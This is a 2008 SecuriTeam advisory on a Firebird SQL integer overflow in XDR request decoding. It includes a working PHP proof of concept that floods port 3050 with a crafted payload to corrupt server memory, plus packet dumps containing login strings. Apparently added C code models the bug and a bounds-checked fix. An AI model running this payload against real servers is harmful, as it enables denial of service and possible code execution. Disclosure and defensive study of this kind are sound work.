[EXPL] Firebird Integer Overflow (Exploit)

Subject: [EXPL] Firebird Integer Overflow (Exploit)
Date: 16 Mar 2008 19:02:48 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com


  Firebird Integer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

 <http://www.firebirdsql.org/> Firebird is "a relational database offering 
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of 
Unix platforms". An integer overflow in the way the Firebird server decodes 
XDR remote-protocol requests allows an attacker who can reach the server 
port (3050/tcp) to corrupt server memory; according to the proof of concept 
below this may allow execution of arbitrary code.

DETAILS

Vulnerable Systems:
 * Firebird SQL version 1.0.3 and before.
 * Firebird SQL version 1.5.5 and before.
 * Firebird SQL version 2.0.3 and before.
 * Firebird SQL version 2.1.0 Beta 2 and before.

Immune Systems:
 * Firebird SQL version 1.5.6 (to be released)
 * Firebird SQL version 2.0.4 (to be released)
 * Firebird SQL version 2.1.0 RC1


Exploit:
<?php
/**
 *  FIREBIRD REMOTE BUFFER OVERFLOW.
 *  ITDEFENCE.ru Proof-of-Concept (POC)
 *  Eugene Minaev (underwater@itdefence.ru)
 *
 *  Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 1.5.6,
 *  2.0.x before 2.0.4, and 2.1.x before 2.1.0 RC1 might allow remote
 *  attackers to execute arbitrary code via crafted op_receive, op_start,
 *  op_start_and_receive, op_send, op_start_and_send, and
 *  op_start_send_and_receive XDR requests, which triggers memory corruption.
 *
 *  Vulnerable packages
 *
 *      Firebird SQL 1.0.3 and before.
 *      Firebird SQL 1.5.5 and before.
 *      Firebird SQL 2.0.3 and before.
 *      Firebird SQL 2.1.0 Beta 2 and before.
 *
 *  Non-vulnerable packages
 *
 *      Firebird SQL 1.5.6 (to be released)
 *      Firebird SQL 2.0.4 (to be released)
 *      Firebird SQL 2.1.0 RC1
 *
 *  src/remote/protocol.cpp:417
 *
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
 *      return xdr_request(xdrs, data->p_data_request,
 *           data->p_data_message_number,
 *           data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
 *
 *  Firebird Connect Packet
 *
 *  0x0000   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   ..............E.
 *  0x0010   00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8   ......@..%..|c..
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10   |c............P.
 *  0x0030   40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00   @...............
 *  0x0040   00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F   .........<C:\Pro
 *  0x0050   67 72 61 6D 20 46 69 6C-65 73 5C 46 69 72 65 62   gram Files\Fireb
 *  0x0060   69 72 64 5C 46 69 72 65-62 69 72 64 5F 31 5F 35   ird\Firebird_1_5
 *  0x0070   5C 65 78 61 6D 70 6C 65-73 5C 45 4D 50 4C 4F 59   \examples\EMPLOY
 *  0x0080   45 45 2E 66 64 62 00 00-00 02 00 00 00 13 01 04   EE.fdb..........
 *  0x0090   52 4F 4F 54 04 09 75 6E-64 65 72 77 68 61 74 06   ROOT..underwhat.
 *  0x00A0   00 00 00 00 00 08 00 00-00 01 00 00 00 02 00 00   ................
 *  0x00B0   00 03 00 00 00 02 00 00-00 0A 00 00 00 01 00 00   ................
 *  0x00C0   00 02 00 00 00 03 00 00-00 04                     ..........
 *
 *  Firebird Login Packet.
 *
 *  0x0000   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   ..............E.
 *  0x0010   00 94 00 00 6C 6C 40 06-93 E0 C0 A8 7C 63 C0 A8   ....ll@.....|c..
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 95 00 00 00 11 50 10   |c............P.
 *  0x0030   40 00 00 00 00 00 00 00-00 13 00 00 00 00 00 00   @...............
 *  0x0040   00 3C 43 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C   .<C:\Program Fil
 *  0x0050   65 73 5C 46 69 72 65 62-69 72 64 5C 46 69 72 65   es\Firebird\Fire
 *  0x0060   62 69 72 64 5F 31 5F 35-5C 65 78 61 6D 70 6C 65   bird_1_5\example
 *  0x0070   73 5C 45 4D 50 4C 4F 59-45 45 2E 66 64 62 00 00   s\EMPLOYEE.fdb..
 *  0x0080   00 1E 01 1C 06 53 59 53-44 42 41 1E 0B 51 50 33   .....SYSDBA..QP3
 *  0x0090   4C 4D 5A 2F 4D 4A 68 2E-3A 04 00 00 00 00 3E 00   LMZ/MJh.:.....>.
 *  0x00A0   00 00                                             ..
 *
 */

/* Payload: a 4-byte big-endian XDR opcode word (0x0000004a) followed by
 * 3000 bytes of 0x4a. For the op_* requests listed above, the server goes
 * on to decode that filler as the 16-bit request / incarnation /
 * transaction / message-number fields shown in the protocol.cpp snippet. */
$___suntzu = "\x00\x00\x00\x4a" . str_repeat("\x4a", 3000);

/* Five attempts, each on a fresh TCP connection to the Firebird port. */
for ($temp = 0; $temp < 5; $temp++) {
    $___zuntzu = fsockopen('192.168.124.99', 3050, $errno, $errstr, 5);
    if ($___zuntzu === false) {
        fwrite(STDERR, "connect failed: $errstr ($errno)\n");
        break;
    }
    fwrite($___zuntzu, $___suntzu);
    fclose($___zuntzu);
    sleep(1);
}
?>
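What the protocol.cpp snippet and the payload add up to, as an added model in C (my code, not Firebird's and not part of the advisory): each p_data field arrives as a 4-byte XDR word that xdr_short narrows to a signed 16-bit value, and the message number is then used to pick an entry out of a per-request table. The table (Request, max_msg, msg_table, the 64-byte Message) and the 20-byte layout after the opcode are constructed for the demonstration; the decode of the advisory's own payload (0x0000004a plus 0x4a filler) is exact. The unchecked variant reports the offset such code would compute instead of dereferencing it, and the checked variant shows the bound the decoder needs.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the server-side request state: a small fixed
 * table of messages. Names and sizes are assumptions for this demo only. */
#define MAX_MSG 4
typedef struct { uint8_t body[64]; } Message;
typedef struct {
    int     max_msg;             /* entries actually valid for this request */
    Message msg_table[MAX_MSG];
} Request;

/* Opcode plus the four short fields the protocol.cpp snippet decodes. */
typedef struct {
    uint32_t opcode;
    int16_t  request, incarnation, transaction, message_number;
} PData;

/* XDR carries every integer, shorts included, as a 4-byte big-endian word. */
static uint32_t xdr_word(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Model of xdr_short: the word is narrowed to a signed 16-bit value, so
 * 0x00008000 becomes -32768 and the filler word 0x4a4a4a4a becomes 0x4a4a. */
static int16_t xdr_short_trunc(const uint8_t *p) {
    return (int16_t)(uint16_t)(xdr_word(p) & 0xffffu);
}

/* Decode opcode + four shorts (20 bytes). Returns -1 on a short buffer. */
static int decode_p_data(const uint8_t *buf, size_t len, PData *out) {
    if (len < 20) return -1;
    out->opcode         = xdr_word(buf);
    out->request        = xdr_short_trunc(buf + 4);
    out->incarnation    = xdr_short_trunc(buf + 8);
    out->transaction    = xdr_short_trunc(buf + 12);
    out->message_number = xdr_short_trunc(buf + 16);
    return 0;
}

/* Vulnerable pattern: use the wire value as the table index. This returns
 * the byte offset from the table base that such code would add; anything
 * negative or beyond max_msg * sizeof(Message) is a memory write outside
 * the table, which is why the model computes it rather than touching it. */
static long msg_offset_unchecked(const PData *d) {
    return (long)d->message_number * (long)sizeof(Message);
}

/* Hardened form: reject any message number outside [0, max_msg). */
static int msg_lookup_checked(const Request *r, const PData *d, const Message **out) {
    *out = NULL;
    if (d->message_number < 0 || d->message_number >= r->max_msg) return -1;
    *out = &r->msg_table[d->message_number];
    return 0;
}

/* Rebuild the advisory's payload: opcode word 0x0000004a + 3000 x 0x4a. */
static size_t poc_payload(uint8_t *buf, size_t cap) {
    static const uint8_t op[4] = { 0x00, 0x00, 0x00, 0x4a };
    if (cap < 3004) return 0;
    memcpy(buf, op, 4);
    memset(buf + 4, 0x4a, 3000);
    return 3004;
}

int main(void) {
    uint8_t wire[3004];
    size_t n = poc_payload(wire, sizeof wire);
    PData d;
    Request r;
    const Message *m;

    memset(&r, 0, sizeof r);
    r.max_msg = 2;                  /* constructed: only two messages exist */

    if (decode_p_data(wire, n, &d) != 0) return 1;
    printf("opcode=0x%x message_number=%d\n", (unsigned)d.opcode, d.message_number);
    printf("unchecked offset: %ld bytes from the table base\n", msg_offset_unchecked(&d));
    printf("checked lookup: %s\n", msg_lookup_checked(&r, &d, &m) == 0 ? "ok" : "rejected");
    return 0;
}
```

Two details worth noticing when reading the output: the filler decodes to 19018 in every short field, so the index is thousands of entries past a table of two, and a word such as 0x00018000 passes the narrowing as -32768, so a signed-versus-unsigned check alone is not enough; the hardened lookup tests both ends of the range.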
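To see what the server is actually parsing before it ever reaches the vulnerable fields, here is an added XDR reader (my code, not Firebird's) run over the Firebird payload of the "Connect Packet" dump above, i.e. the bytes from offset 0x36 onward, past the 54-byte Ethernet, IP and TCP headers. The bytes are copied from the dump; the field meanings in the comments are my reading of them and of Firebird's op_connect layout, not something the advisory states (op_connect = 1 and op_attach = 19 are the values visible in the dump). The point of the reader is the cstring check: every length comes from the peer and is compared with the bytes remaining before anything is copied or skipped, which is the discipline the vulnerable decode path lacks.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Firebird payload of the connect packet from the dump (148 bytes). */
static const uint8_t connect_payload[] =
    "\x00\x00\x00\x01"                      /* op_connect */
    "\x00\x00\x00\x13"                      /* operation wanted next: 19, op_attach */
    "\x00\x00\x00\x02"                      /* connect protocol version */
    "\x00\x00\x00\x1d"                      /* client architecture code */
    "\x00\x00\x00\x3c"                      /* cstring: 60-byte database path */
    "C:\\Program Files\\Firebird\\Firebird_1_5\\examples\\EMPLOYEE.fdb"
    "\x00\x00\x00\x02"                      /* number of protocol versions offered */
    "\x00\x00\x00\x13"                      /* cstring: 19-byte user-id block + 1 pad */
    "\x01\x04" "ROOT" "\x04\x09" "underwhat" "\x06\x00" "\x00"
    "\x00\x00\x00\x08" "\x00\x00\x00\x01" "\x00\x00\x00\x02" "\x00\x00\x00\x03" "\x00\x00\x00\x02"
    "\x00\x00\x00\x0a" "\x00\x00\x00\x01" "\x00\x00\x00\x02" "\x00\x00\x00\x03" "\x00\x00\x00\x04";
#define CONNECT_LEN (sizeof(connect_payload) - 1)   /* drop the literal's NUL */

typedef struct { const uint8_t *p; size_t left; } XdrIn;

/* One 4-byte big-endian XDR word; fails instead of reading past the end. */
static int xdr_u32(XdrIn *in, uint32_t *v) {
    if (in->left < 4) return -1;
    *v = ((uint32_t)in->p[0] << 24) | ((uint32_t)in->p[1] << 16) |
         ((uint32_t)in->p[2] << 8)  |  (uint32_t)in->p[3];
    in->p += 4; in->left -= 4;
    return 0;
}

/* XDR cstring: length word, bytes, zero padding to a 4-byte boundary.
 * The length is attacker-controlled, so it is bounded by what remains. */
static int xdr_cstring(XdrIn *in, const uint8_t **data, uint32_t *len) {
    uint32_t n;
    size_t padded;
    if (xdr_u32(in, &n) != 0 || n > in->left) return -1;
    padded = ((size_t)n + 3) & ~(size_t)3;
    if (padded > in->left) return -1;
    *data = in->p; *len = n;
    in->p += padded; in->left -= padded;
    return 0;
}

typedef struct {
    uint32_t op, operation, cversion, arch, count;
    char     file[256];
    uint32_t file_len;
    const uint8_t *user_id;
    uint32_t user_id_len;
    uint32_t versions_seen;
} Connect;

/* Walk an op_connect payload. Returns 0 on success, -1 on any framing error. */
static int parse_connect(const uint8_t *buf, size_t len, Connect *c) {
    XdrIn in = { buf, len };
    const uint8_t *s;
    uint32_t n, i, k, v;
    memset(c, 0, sizeof *c);
    if (xdr_u32(&in, &c->op) || xdr_u32(&in, &c->operation) ||
        xdr_u32(&in, &c->cversion) || xdr_u32(&in, &c->arch)) return -1;
    if (c->op != 1) return -1;                          /* not op_connect */
    if (xdr_cstring(&in, &s, &n) || n >= sizeof c->file) return -1;
    memcpy(c->file, s, n); c->file[n] = '\0'; c->file_len = n;
    if (xdr_u32(&in, &c->count)) return -1;
    if (xdr_cstring(&in, &c->user_id, &c->user_id_len)) return -1;
    /* Each offered protocol is five words (version, architecture, min type,
     * max type, weight in my reading of the dump). count is peer-controlled,
     * so the loop stops at the end of the buffer rather than trusting it. */
    for (i = 0; i < c->count; i++) {
        for (k = 0; k < 5; k++) if (xdr_u32(&in, &v)) return -1;
        c->versions_seen++;
    }
    return 0;
}

int main(void) {
    Connect c;
    if (parse_connect(connect_payload, CONNECT_LEN, &c) != 0) { puts("rejected"); return 1; }
    printf("op=%u next=%u cversion=%u arch=%u file=%s protocols=%u\n",
           (unsigned)c.op, (unsigned)c.operation, (unsigned)c.cversion,
           (unsigned)c.arch, c.file, (unsigned)c.versions_seen);
    return 0;
}
```

Fed the advisory's payload instead, the same reader takes 0x0000004a as the opcode and then refuses the first 0x4a4a4a4a word as a string length, because it exceeds the bytes on the wire; a decoder that believed it would read, or copy, far past the end of the packet.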


ADDITIONAL INFORMATION

The information has been provided by  <mailto:underwater@itdefence.ru> 
Eugene Minaev.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 



